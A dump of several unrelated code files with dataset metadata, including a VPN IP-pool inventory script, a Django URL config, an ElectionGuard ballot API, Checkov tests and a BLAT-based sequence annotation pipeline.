sql = 'SELECT * FROM accounts'
CUR.execute(sql)
return CUR.fetchall()
def get_accounts_full():
""" Get all user accounts along with respective ip addresses assigned """
sql = 'SELECT * FROM accounts LEFT JOIN ippools on accounts.ippool_id = ippools.id'
CUR.execute(sql)
return CUR.fetchall()
def get_ippools():
""" Get all IP pools"""
sql = 'SELECT * FROM ippools'
CUR.execute(sql)
return CUR.fetchall()
def get_database():
""" Return instance of database connection"""
connection = sqlite3.connect('vpnaccount.db')
connection.row_factory = dict_factory
return connection
def create_tables():
""" Initialize database with new tables """
sql = """CREATE TABLE IF NOT EXISTS accounts
(id INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR(100) NOT NULL,
email VARCHAR(100) NOT NULL,
status INTEGER,
ippool_id INTEGER,
CONSTRAINT username_unique UNIQUE (username)
)"""
CONN.cursor().execute(sql)
sql = """CREATE TABLE IF NOT EXISTS ippools
(id INTEGER PRIMARY KEY AUTOINCREMENT,
network VARCHAR(100) NOT NULL,
subnet VARCHAR(100) NOT NULL,
first_ip VARCHAR(100) NOT NULL,
last_ip VARCHAR(100) NOT NULL,
broadcast VARCHAR(100) NOT NULL,
status INTEGER,
CONSTRAINT network_address UNIQUE (network, first_ip, last_ip)
)"""
CONN.cursor().execute(sql)
CONN.commit()
def get_available_ip():
""" Returns the first IP pair available """
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE status = 0')
return cur.fetchone()
def get_ippool_id(first_ip, last_ip, network, subnet):
""" Returns IP pool id for given input parameters"""
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE network = ? AND first_ip = ? AND last_ip = ? and subnet LIKE ?', [network, first_ip, last_ip, subnet])
return cur.fetchone()
def create_ippools(subnet=DEFAULT_SUBNET, name=DEFAULT_GROUP):
""" Populates IP pools database """
CONN.cursor().executemany('INSERT INTO ippools(network, subnet, first_ip, last_ip, broadcast, status) VALUES (?,?,?,?,?,?)', get_pools(subnet, name))
CONN.commit()
def create_user(email):
""" Create a new user and assign it an IP pair """
ip_address_id = get_available_ip()['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def create_user_hardcoded(email, first_ip, last_ip, subnet):
""" Create a new user from existing system, preserving ip pairs """
network = DEFAULT_NETWORK + get_octets(first_ip)[2] + '.0'
first_ip = get_octets(first_ip)[3]
last_ip = get_octets(last_ip)[3]
print(first_ip, last_ip, network, subnet)
ip_address_id = get_ippool_id(first_ip, last_ip, network, subnet)['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def revoke_user(email):
""" Disable user and free its IP pair """
cur = CONN.cursor()
cur.execute('SELECT * FROM accounts WHERE username LIKE ?', (email,))
account = cur.fetchone()
cur.execute('UPDATE accounts SET status = 0 WHERE id = ?', (int(account['id']), )) # also remove ippool_id?
cur.execute('UPDATE ippools SET status = 0 WHERE id = ?', (int(account['ippool_id']), ))
CONN.commit()
def handler_create_pool(arguments):
if len(arguments) == 2:
print('Creating subnet with provided name and range.')
create_ippools(arguments[0], arguments[1])
elif len(arguments) == 1:
print('You should provide no arguments for defaults or subnet and group name e.g. --create-pool 16 prod')
else:
print('Creating default subnet.')
create_ippools()
def handler_create_user_hardcoded(arguments):
if len(arguments) != 4:
print('You need to specify 4 params: EMAIL FISTIP LASTIP SUBNET')
return
email = arguments[0]
first_ip = arguments[1]
last_ip = arguments[2]
subnet = arguments[3]
create_user_hardcoded(email, first_ip, last_ip, subnet)
#
# main
#
CONN = get_database()
# if not database_initialized:
create_tables()
CUR = CONN.cursor()
ARGS = get_arguments()
if ARGS["show_accounts"]:
printer(get_accounts())
if ARGS["show_accounts_full"]:
printer(get_accounts_full())
if ARGS["show_pools"]:
printer(get_ippools())
if ARGS["create_account"] is not None:
create_user(ARGS["create_account"])
if ARGS["create_account_hardcoded"] is not None:
handler_create_user_hardcoded(ARGS["create_account_hardcoded"])
if ARGS["revoke_account"] is not None:
revoke_user(ARGS["revoke_account"])
if ARGS["create_pool"] is not None:
handler_create_pool(ARGS["create_pool"])
CONN.close() | en | 0.502017 | #!/usr/bin/env python # VPN account/network inventory # def get_ippools_usage(conn): # return { # '.0.1': 0.40, # '.0.4': 0.00 # } # User Actions # parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.') # parser.add_argument('--password-reset', help='Reset a VPN account password.') # Pool Actions # Usage View # View format # parser.print_help() Generates list of IP pairs on a /20 available for the given subnet. # each client needs 4 ips - must be divisible by 4 # Allows for 0.0/20 0.16/20 0.32/20 Get all user accounts Get all user accounts along with respective ip addresses assigned Get all IP pools Return instance of database connection Initialize database with new tables CREATE TABLE IF NOT EXISTS accounts (id INTEGER PRIMARY KEY AUTOINCREMENT, username VARCHAR(100) NOT NULL, email VARCHAR(100) NOT NULL, status INTEGER, ippool_id INTEGER, CONSTRAINT username_unique UNIQUE (username) ) CREATE TABLE IF NOT EXISTS ippools (id INTEGER PRIMARY KEY AUTOINCREMENT, network VARCHAR(100) NOT NULL, subnet VARCHAR(100) NOT NULL, first_ip VARCHAR(100) NOT NULL, last_ip VARCHAR(100) NOT NULL, broadcast VARCHAR(100) NOT NULL, status INTEGER, CONSTRAINT network_address UNIQUE (network, first_ip, last_ip) ) Returns the first IP pair available Returns IP pool id for given input parameters Populates IP pools database Create a new user and assign it an IP pair Create a new user from existing system, preserving ip pairs Disable user and free its IP pair # also remove ippool_id? # # main # # if not database_initialized: | 2.634128 | 3 |
Modulo 1/Aula09_Exercicios/exercicios01.py | icarogoggin/BlueEdtech | 0 | 6616664 | <reponame>icarogoggin/BlueEdtech<gh_stars>0
#1. Crie um código em Python que pede qual tabuada o usuário quer ver, em seguida imprima essa tabuada.
n1 = int(input('Digite a tabuada que você quer calcular: '))
for i in range(1,11):
multiplicacao = n1*i
print(f'{n1} X {i} = {multiplicacao}')
| #1. Crie um código em Python que pede qual tabuada o usuário quer ver, em seguida imprima essa tabuada.
n1 = int(input('Digite a tabuada que você quer calcular: '))
for i in range(1,11):
multiplicacao = n1*i
print(f'{n1} X {i} = {multiplicacao}') | pt | 0.987395 | #1. Crie um código em Python que pede qual tabuada o usuário quer ver, em seguida imprima essa tabuada. | 3.969363 | 4 |
ht/airyslide/urls.py | caoxuCarlos/htyw_ecust | 0 | 6616665 | <filename>ht/airyslide/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('', views.slide, name='slide-first'),
path('service1', views.making, name='service1'),
path('service2', views.modification, name='service2'),
]
| <filename>ht/airyslide/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('', views.slide, name='slide-first'),
path('service1', views.making, name='service1'),
path('service2', views.modification, name='service2'),
]
| none | 1 | 1.976994 | 2 | |
tests/utils.py | SauravMaheshkar/paww | 0 | 6616666 | import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from torch.utils.data import DataLoader
from paww.augmentation import get_transforms
from paww.dataloader import PawwDataset
def get_dataloader(cfg):
train = pd.read_csv("data/petfinder-pawpularity-score/train.csv")
def get_train_file_path(image_id):
return "data/petfinder-pawpularity-score/train/{}.jpg".format(image_id)
train["file_path"] = train["Id"].apply(get_train_file_path)
num_bins = int(np.floor(1 + np.log2(len(train))))
train["bins"] = pd.cut(train[cfg["target_col"]], bins=num_bins, labels=False)
Fold = StratifiedKFold(
n_splits=cfg["folds"], shuffle=True, random_state=cfg["seed"]
)
for n, (train_index, val_index) in enumerate(Fold.split(train, train["bins"])):
train.loc[val_index, "fold"] = int(n)
train["fold"] = train["fold"].astype(int)
trn_idx = train[train["fold"] != 0].index
train_folds = train.loc[trn_idx].reset_index(drop=True)
train_dataset = PawwDataset(
cfg, train_folds, transform=get_transforms(cfg, data="train")
)
dataloader = DataLoader(
train_dataset,
batch_size=cfg["batch_size"],
shuffle=True,
num_workers=cfg["num_workers"],
pin_memory=True,
drop_last=True,
)
return dataloader
| import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from torch.utils.data import DataLoader
from paww.augmentation import get_transforms
from paww.dataloader import PawwDataset
def get_dataloader(cfg):
train = pd.read_csv("data/petfinder-pawpularity-score/train.csv")
def get_train_file_path(image_id):
return "data/petfinder-pawpularity-score/train/{}.jpg".format(image_id)
train["file_path"] = train["Id"].apply(get_train_file_path)
num_bins = int(np.floor(1 + np.log2(len(train))))
train["bins"] = pd.cut(train[cfg["target_col"]], bins=num_bins, labels=False)
Fold = StratifiedKFold(
n_splits=cfg["folds"], shuffle=True, random_state=cfg["seed"]
)
for n, (train_index, val_index) in enumerate(Fold.split(train, train["bins"])):
train.loc[val_index, "fold"] = int(n)
train["fold"] = train["fold"].astype(int)
trn_idx = train[train["fold"] != 0].index
train_folds = train.loc[trn_idx].reset_index(drop=True)
train_dataset = PawwDataset(
cfg, train_folds, transform=get_transforms(cfg, data="train")
)
dataloader = DataLoader(
train_dataset,
batch_size=cfg["batch_size"],
shuffle=True,
num_workers=cfg["num_workers"],
pin_memory=True,
drop_last=True,
)
return dataloader
| none | 1 | 2.256552 | 2 | |
app/ballot.py | RIT-Election-Security/SAVI-ballotserver | 0 | 6616667 | <filename>app/ballot.py<gh_stars>0
from electionguard.ballot import PlaintextBallot
from electionguard.group import int_to_q
from fastapi import APIRouter
from pydantic import BaseModel
from uuid import uuid4
import hashlib
import json
import os.path
from .election import election
from .manifest import generate_ballot_style_contests, get_contest_info, get_selection_info
from .config import STORAGE_DIR, RECEIVED_HASH_FILE, store_hash
router = APIRouter()
class BallotInfoRequest(BaseModel):
ballot_style: str
class BallotMarkingRequest(BaseModel):
ballot_style: str
selections: dict
class BallotEncryptionRequest(BaseModel):
ballot: dict
action: str
class BallotChallengeRequest(BaseModel):
verification_code: str
@router.post("/info")
async def gen_ballot_info(ballot_info_params: BallotInfoRequest):
"""
Given a ballot style, compile and return relevant election information
Args:
ballot_info_paramse: BallotInfoRequest containing ballot style
Returns:
JSON structure for ballot_style with returned from get_contest_info
"""
# Get base ballot info
ballot_info = generate_ballot_style_contests(election.manifest, ballot_info_params.ballot_style)
for contest in ballot_info["contests"]:
# Get contest info
contest_info = get_contest_info(election.manifest, contest["object_id"])
# Populate information
contest.update(contest_info)
return ballot_info
@router.post("/mark")
async def mark_ballot(ballot_marking_params: BallotMarkingRequest):
"""
Mark all selections on a ballot.
Args:
ballot_marking_params: ballot_style and voter selections
Returns:
Marked ballot JSON returned by get_selection_info()
TODO: handle errors gracefully
TODO: check number of votes and weights
"""
# Get base ballot info
ballot = generate_ballot_style_contests(election.manifest, ballot_marking_params.ballot_style)
# Give ballot unique ID
ballot["object_id"] = f"ballot-{uuid4()}"
# Mark mark each selection
for contest in ballot["contests"]:
contest_id = contest["object_id"]
selected_candidate_id = ballot_marking_params.selections.get(contest_id)
selection_info = get_selection_info(election.manifest, contest_id, selected_candidate_id)
contest["ballot_selections"] = [selection_info]
return ballot
@router.post("/submit")
async def encrypt_ballot(ballot_encryption_params: BallotEncryptionRequest):
"""
Encrypt a ballot and generate a receipt
Args:
ballot_encryption_params: ballot JSON
Returns:
receipt JSON with verification code, hashes, and timestamp
"""
# Assert that action is valid before processing ballot
assert ballot_encryption_params.action == "CAST" or ballot_encryption_params.action == "SPOIL"
# ballot_encryption_params.ballot is a dict, which we convert to a JSON string
# call .encode() on the string and feed it into sha256
unenc_hash = hashlib.sha256(json.dumps(ballot_encryption_params.ballot).encode()).hexdigest()
# Make and encrypt ballot object
ballot = PlaintextBallot.from_json_object(ballot_encryption_params.ballot)
encrypted_ballot = election.encryption_mediator.encrypt(ballot)
# the ballot type has a function to run it through sha256 with something prepended to it
# this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string
enc_hash = encrypted_ballot.crypto_hash_with(int_to_q(0)).to_hex()
# Cast or spoil ballot depending on action
if ballot_encryption_params.action == "CAST":
election.ballotbox.cast(encrypted_ballot)
store_hash(enc_hash, RECEIVED_HASH_FILE)
else:
election.ballotbox.spoil(encrypted_ballot)
# Return verification code and timestamp
return {
"verification_code": encrypted_ballot.object_id,
"timestamp": encrypted_ballot.timestamp,
"unenc_hash": unenc_hash,
"enc_hash": enc_hash
}
@router.post("/challenge")
async def challenge(ballot_challenge_request: BallotChallengeRequest):
challenged = election.challenge_ballot(ballot_challenge_request.verification_code)
if challenged:
ballot = {
"ballot_id": challenged.object_id,
"contests": [
{
"object_id": contest.object_id,
"ballot_selections": [
{
"object_id": selection.object_id,
"tally": selection.tally
}
for selection in contest.selections.values() if selection.tally > 0
]
}
for contest in challenged.contests.values()
]
}
else:
ballot = {}
return ballot
@router.get("/hashes")
async def get_received_hashes():
"""
Get the hash of every ballot that was received
:return: JSON array with all the hashes as strings
"""
with open(os.path.join(STORAGE_DIR, RECEIVED_HASH_FILE), "r") as f:
contents = f.read()
return {"hashes": contents.splitlines()} | <filename>app/ballot.py<gh_stars>0
from electionguard.ballot import PlaintextBallot
from electionguard.group import int_to_q
from fastapi import APIRouter
from pydantic import BaseModel
from uuid import uuid4
import hashlib
import json
import os.path
from .election import election
from .manifest import generate_ballot_style_contests, get_contest_info, get_selection_info
from .config import STORAGE_DIR, RECEIVED_HASH_FILE, store_hash
router = APIRouter()
class BallotInfoRequest(BaseModel):
ballot_style: str
class BallotMarkingRequest(BaseModel):
ballot_style: str
selections: dict
class BallotEncryptionRequest(BaseModel):
ballot: dict
action: str
class BallotChallengeRequest(BaseModel):
verification_code: str
@router.post("/info")
async def gen_ballot_info(ballot_info_params: BallotInfoRequest):
"""
Given a ballot style, compile and return relevant election information
Args:
ballot_info_paramse: BallotInfoRequest containing ballot style
Returns:
JSON structure for ballot_style with returned from get_contest_info
"""
# Get base ballot info
ballot_info = generate_ballot_style_contests(election.manifest, ballot_info_params.ballot_style)
for contest in ballot_info["contests"]:
# Get contest info
contest_info = get_contest_info(election.manifest, contest["object_id"])
# Populate information
contest.update(contest_info)
return ballot_info
@router.post("/mark")
async def mark_ballot(ballot_marking_params: BallotMarkingRequest):
"""
Mark all selections on a ballot.
Args:
ballot_marking_params: ballot_style and voter selections
Returns:
Marked ballot JSON returned by get_selection_info()
TODO: handle errors gracefully
TODO: check number of votes and weights
"""
# Get base ballot info
ballot = generate_ballot_style_contests(election.manifest, ballot_marking_params.ballot_style)
# Give ballot unique ID
ballot["object_id"] = f"ballot-{uuid4()}"
# Mark mark each selection
for contest in ballot["contests"]:
contest_id = contest["object_id"]
selected_candidate_id = ballot_marking_params.selections.get(contest_id)
selection_info = get_selection_info(election.manifest, contest_id, selected_candidate_id)
contest["ballot_selections"] = [selection_info]
return ballot
@router.post("/submit")
async def encrypt_ballot(ballot_encryption_params: BallotEncryptionRequest):
"""
Encrypt a ballot and generate a receipt
Args:
ballot_encryption_params: ballot JSON
Returns:
receipt JSON with verification code, hashes, and timestamp
"""
# Assert that action is valid before processing ballot
assert ballot_encryption_params.action == "CAST" or ballot_encryption_params.action == "SPOIL"
# ballot_encryption_params.ballot is a dict, which we convert to a JSON string
# call .encode() on the string and feed it into sha256
unenc_hash = hashlib.sha256(json.dumps(ballot_encryption_params.ballot).encode()).hexdigest()
# Make and encrypt ballot object
ballot = PlaintextBallot.from_json_object(ballot_encryption_params.ballot)
encrypted_ballot = election.encryption_mediator.encrypt(ballot)
# the ballot type has a function to run it through sha256 with something prepended to it
# this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string
enc_hash = encrypted_ballot.crypto_hash_with(int_to_q(0)).to_hex()
# Cast or spoil ballot depending on action
if ballot_encryption_params.action == "CAST":
election.ballotbox.cast(encrypted_ballot)
store_hash(enc_hash, RECEIVED_HASH_FILE)
else:
election.ballotbox.spoil(encrypted_ballot)
# Return verification code and timestamp
return {
"verification_code": encrypted_ballot.object_id,
"timestamp": encrypted_ballot.timestamp,
"unenc_hash": unenc_hash,
"enc_hash": enc_hash
}
@router.post("/challenge")
async def challenge(ballot_challenge_request: BallotChallengeRequest):
challenged = election.challenge_ballot(ballot_challenge_request.verification_code)
if challenged:
ballot = {
"ballot_id": challenged.object_id,
"contests": [
{
"object_id": contest.object_id,
"ballot_selections": [
{
"object_id": selection.object_id,
"tally": selection.tally
}
for selection in contest.selections.values() if selection.tally > 0
]
}
for contest in challenged.contests.values()
]
}
else:
ballot = {}
return ballot
@router.get("/hashes")
async def get_received_hashes():
"""
Get the hash of every ballot that was received
:return: JSON array with all the hashes as strings
"""
with open(os.path.join(STORAGE_DIR, RECEIVED_HASH_FILE), "r") as f:
contents = f.read()
return {"hashes": contents.splitlines()} | en | 0.798159 | Given a ballot style, compile and return relevant election information Args: ballot_info_paramse: BallotInfoRequest containing ballot style Returns: JSON structure for ballot_style with returned from get_contest_info # Get base ballot info # Get contest info # Populate information Mark all selections on a ballot. Args: ballot_marking_params: ballot_style and voter selections Returns: Marked ballot JSON returned by get_selection_info() TODO: handle errors gracefully TODO: check number of votes and weights # Get base ballot info # Give ballot unique ID # Mark mark each selection Encrypt a ballot and generate a receipt Args: ballot_encryption_params: ballot JSON Returns: receipt JSON with verification code, hashes, and timestamp # Assert that action is valid before processing ballot # ballot_encryption_params.ballot is a dict, which we convert to a JSON string # call .encode() on the string and feed it into sha256 # Make and encrypt ballot object # the ballot type has a function to run it through sha256 with something prepended to it # this returns an ElementModQ, a variety of BigInteger, which has .to_hex() to make a hex string # Cast or spoil ballot depending on action # Return verification code and timestamp Get the hash of every ballot that was received :return: JSON array with all the hashes as strings | 2.60331 | 3 |
scripts/get_siteinfo.py | HAKSOAT/python-mwtext | 4 | 6616668 | <gh_stars>1-10
from mwapi.session import Session
wiki_host = "https://en.wikipedia.org"
session = Session(wiki_host, user_agent="mwtext scripts get_siteinfo")
doc = session.get(
action="query",
meta="siteinfo",
siprop=["namespaces", "namespacealiases", "general"],
formatversion=2
)
siteinfo = doc["query"]
| from mwapi.session import Session
wiki_host = "https://en.wikipedia.org"
session = Session(wiki_host, user_agent="mwtext scripts get_siteinfo")
doc = session.get(
action="query",
meta="siteinfo",
siprop=["namespaces", "namespacealiases", "general"],
formatversion=2
)
siteinfo = doc["query"] | none | 1 | 2.370214 | 2 | |
tests/terraform/runner/test_plan_runner.py | soufiane444/checkov | 1 | 6616669 | import os
import unittest
from checkov.runner_filter import RunnerFilter
from checkov.terraform.plan_runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_runner_two_checks_only(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan/tfplan.json"
runner = Runner()
checks_allowlist = ['CKV_AWS_21']
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all', checks=checks_allowlist))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
for record in report.failed_checks:
self.assertIn(record.check_id, checks_allowlist)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 3)
def test_runner_child_modules(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan_with_child_modules/tfplan.json"
runner = Runner()
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 4)
def test_runner_root_dir(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = current_dir + "/resources"
runner = Runner()
report = runner.run(root_folder=root_dir, files=None, external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(41, report.get_summary()["failed"])
self.assertEqual(60, report.get_summary()["passed"])
files_scanned = list(set(map(lambda rec: rec.file_path, report.failed_checks)))
self.assertGreaterEqual(2, len(files_scanned))
if __name__ == '__main__':
unittest.main()
| import os
import unittest
from checkov.runner_filter import RunnerFilter
from checkov.terraform.plan_runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_runner_two_checks_only(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan/tfplan.json"
runner = Runner()
checks_allowlist = ['CKV_AWS_21']
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all', checks=checks_allowlist))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
for record in report.failed_checks:
self.assertIn(record.check_id, checks_allowlist)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 3)
def test_runner_child_modules(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
valid_plan_path = current_dir + "/resources/plan_with_child_modules/tfplan.json"
runner = Runner()
report = runner.run(root_folder=None, files=[valid_plan_path], external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(report.get_summary()["failed"], 3)
self.assertEqual(report.get_summary()["passed"], 4)
def test_runner_root_dir(self):
current_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = current_dir + "/resources"
runner = Runner()
report = runner.run(root_folder=root_dir, files=None, external_checks_dir=None,
runner_filter=RunnerFilter(framework='all'))
report_json = report.get_json()
self.assertTrue(isinstance(report_json, str))
self.assertIsNotNone(report_json)
self.assertIsNotNone(report.get_test_suites())
self.assertEqual(report.get_exit_code(soft_fail=False), 1)
self.assertEqual(report.get_exit_code(soft_fail=True), 0)
self.assertEqual(41, report.get_summary()["failed"])
self.assertEqual(60, report.get_summary()["passed"])
files_scanned = list(set(map(lambda rec: rec.file_path, report.failed_checks)))
self.assertGreaterEqual(2, len(files_scanned))
if __name__ == '__main__':
unittest.main()
| none | 1 | 2.222093 | 2 | |
src/worker_entrypoint.py | thijsmie/tantalus | 3 | 6616670 | <gh_stars>1-10
import logging
import os
import sys
directory = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, directory)
from tantalus.appfactory.main import create_app
flask, app = create_app()
logging.basicConfig(level=logging.INFO)
app.work() | import logging
import os
import sys
directory = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, directory)
from tantalus.appfactory.main import create_app
flask, app = create_app()
logging.basicConfig(level=logging.INFO)
app.work() | none | 1 | 1.948847 | 2 | |
annotation.py | MaxiEstravis/lenga | 0 | 6616671 | <filename>annotation.py<gh_stars>0
# coding=utf-8
import os
import re
import sys
import time
####### FUNCTION DEFINITIONS #######
def open_file(x): # opens a file given as an absolute or relative path
a = open(x).read().splitlines()
return a
def names(o): # returns a list containing sequences' names
s = open(o).read()
names = re.findall(">.+\n",s)
return names
def sep_seq(o): # returns a list containing 6 grouped peptid sequences by contig (its translation for each frame)
s = open(o).read()
seqs = re.split(">.+\n",s)
seqs.pop(0)
sep = [seqs[x:x+6] for x in range(0,len(seqs),6)]
return sep
def split_orfs(l): # splits ORFs for each frame translation for each contig
split = [[[] for x in range(6)] for x in range(len(l))]
for i in l:
ind = l.index(i)
indf = int((float(ind)/float(len(l)))*100)
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
if ind%3000 == 0:
print "Splitting ORFs: ", indf, "%"
for s in i:
split[l.index(i)][i.index(s)] = s.split("*")
return split
def longest_orf(l): # finds the longest ORF per frame
longest = []
for h in l:
for i in h:
if i:
longest.append(max(i,key = len))
else:
longest.append("ERROR")
ind = l.index(h)
indf = int((float(ind)/float(len(l)))*100)
if ind%3000 == 0:
print "Assigning longest ORF per frame: ", indf, "%"
if ind%30000 == 0:
print("\t\t\t\t"+time.ctime())
return longest
def join(n,s): # reunites each frame's name with its longest ORF
tot = []
for i in n:
ind = n.index(i)
indf = int((float(ind)/float(len(n)))*100)
tot.append(n[ind]+s[ind])
if ind%5000 == 0:
print "Rejoining names and sequences: ", indf, "%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return tot
def annotation(ss,nn): # annotates the dataset ss with reference nn
for i in ss:
for j in nn:
if i[1] in j[0]:
i.append(j[1])
ind = ss.index(i)
indf = int((float(ind)/float(len(ss)))*100)
if ind%5000 == 0:
print "Performing annotation:", indf,"%"
if ind%50000 == 0:
print("\t\t\t\t"+time.ctime())
return ss
######## STATEMENTS ########
fasta = sys.argv[1]
ref_blat = sys.argv[2]
blat = sys.argv[3]
transeq = sys.argv[4]
merge = sys.argv[5]
print("STARTING ANNOTATION PIPELINE FOR %s" % fasta)
pep = fasta[:-6]+'_six_frames.pep'
query_blat = pep[:-4]+'_longest_clean.pep'
result_blat = query_blat[:-4]+'_vs_prot.psl'
def_file = fasta[:-6]+'_def'
sorted_file = fasta[:-6]+'_clean_sorted'
os.system(transeq+' '+fasta+' '+pep+' -frame=6') ######## the translation
print("\n\n\t\tTranslated data file: %s\n\n" % pep)
seq_names = names(pep)
sep = sep_seq(pep)
split = split_orfs(sep)
print "\n\n\t\tORF splitting done\n\n"
for i in split:
if i == [[] for x in range(6)]:
ll = [sep[split.index(i)],sep[split.index(i)+1]]
split2 = orf.split(ll)
split[split.index(i)] = split2[0]
longest = longest_orf(split) ############ longest ORF selection
print "\n\n\t\tLongest ORF selection done\n\n"
seq_clean = [re.sub('\n','',i) for i in longest]
tot = join(seq_names, seq_clean)
with open(query_blat,'a') as file:
for i in tot:
print >> file, i
print("\n\n\t\tLongest ORF per frame file: %s\n\n" % query_blat)
print "\n\n\t\tStarting BLAT\n\n"
os.system('%s -oneOff=1 -noHead -prot %s %s %s' % (blat, ref_blat, query_blat, result_blat)) ######### blat
print("\n\n\t\tBLAT done: result %s\n\n" % result_blat)
os.system('php %s %s > %s' % (merge, result_blat, result_blat+'_merge')) ######## blat correction
n1 = names(ref_blat)
n = [re.sub('\n','',i) for i in n1]
n2 = [re.sub('>','',i) for i in n]
nn = [re.split(' ',i,maxsplit = 1) for i in n2] #### prepares the reference for annotation
q = [re.split('\t',i) for i in open_file(result_blat+'_merge')]
ssa = annotation(q,nn) ##### annotation
print "\n\n\t\tANNOTATION DONE\n\n"
### arranging and sorting of annotation
ss2 = [i[:7] if len(i)>7 else i for i in ssa]
sep = [i for i in ss2 if len(i) == 7]
query_id = [i[0] for i in sep]
target_id = [i[1] for i in sep]
query_len = [i[2] for i in sep]
target_len = [i[3] for i in sep]
align_len = [i[4] for i in sep]
score = [i[5] for i in sep]
target_anot = [i[6] for i in sep]
id_2 = [i[3:] for i in target_id]
target_id = [re.sub('\|.+$','',i) for i in id_2]
target_os = [re.split('=',i[-1])[1][:-3] for i in ssa]
target_short = [re.split('=',i[-1])[0][:-3] for i in ssa]
frames = [re.findall("[\d]$",i) for i in query_id]
frames_def = [''.join(i) for i in frames]
new = [query_id[i][:-2]+'\t'+frames_def[i]+'\t'+score[i]+'\t'+target_id[i]+'\t'+target_len[i]+'\t'+target_short[i]+'\t'+target_os[i] for i in range(len(score))]
with open(fasta[:-6]+'_clean_presorted','a') as file:
for i in new:
print >> file, i
os.system('sort -k1,1 -k2,2 -k3,3 %s > %s' % (fasta[:-6]+'_clean_presorted',sorted_file))
os.system('rm %s' % fasta[:-6]+'_clean_presorted')
print("\n\n\t\tAnnotated and sorted file: %s\n\n" % sorted_file)
###
### best hit selection
neww = [re.sub('\t','',i,count = 1) for i in open_file(sorted_file)]
sepp = [re.split('\t',i) for i in neww]
for i in sepp:
i[1] = float(i[1])
i[3] = int(i[3])
lil = [[sepp[0]]]
for li in sepp[1:]:
if li[0] == lil[-1][-1][0]:
lil[-1].append(li)
else:
lil.append([li])
single = [i[-1] for i in lil]
single_sep = [[a[0][:-1],a[0][-1],a[1],a[2],a[3],a[4],a[5]] for a in single]
single_sep_unique = [[single_sep[0]]]
for li in single_sep[1:]:
if li[0] == single_sep_unique[-1][-1][0]:
single_sep_unique[-1].append(li)
else:
single_sep_unique.append([li])
single_def = []
for i in single_sep_unique:
if len(i) == 1:
single_def.append(i)
elif len(i) == 2:
if i[0][2]>i[1][2]:
single_def.append(i[0])
else:
single_def.append(i[1])
elif len(i) == 3:
if i[0][2]>i[1][2] and i[0][2]>i[2][2]:
single_def.append(i[0])
elif i[1][2]>i[0][2] and i[1][2]>i[2][2]:
single_def.append(i[1])
elif i[2][2]>i[0][2] and i[2][2]>i[1][2]:
single_def.append(i[2])
else:
print "\nTied contig: ", i, "\n"
else:
print "\nContig with more than 3 frames in blat: ", i, "\n"
single_deff = [i[0] if type(i[0]) == list else i for i in single_def]
for i in single_deff:
i[2]=str(i[2])
i[4]=str(i[4])
def_tab = ['\t'.join(i) for i in single_deff]
with open(def_file,'a') as file:
for i in def_tab:
print >> file, i
